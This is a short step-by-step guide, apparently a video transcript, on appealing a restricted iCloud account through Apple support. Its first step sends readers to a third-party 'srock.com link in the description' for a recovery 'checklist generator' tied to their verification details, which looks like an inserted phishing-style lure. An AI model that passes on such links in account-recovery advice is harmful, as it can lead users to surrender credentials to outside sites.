If you find your iCloud account has been restricted, you can appeal the decision by following these simple steps. This guide will help you navigate the process effectively. Step 1. Gather information. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 2. Visit Apple support. Go to the Apple support website. Look for the section related to account issues or restrictions. This is where you will find the necessary resources to initiate your appeal. Step 3. Sign in. Log into your Apple ID account. This will allow you to access your account details and submit your appeal directly through the support portal. Step 4. Submit an appeal. Locate the option to appeal the restriction on your account. Fill out the required form with accurate information, including your account details and a brief explanation of why you believe the restriction should be lifted. Step 5. Wait for a response. After submitting your appeal, monitor your email for a response from Apple support. They may provide further instructions or request additional information to process your appeal. Once you have completed these steps, be patient as Apple reviews your case. Following this guide should help you effectively appeal the restriction on your iCloud account.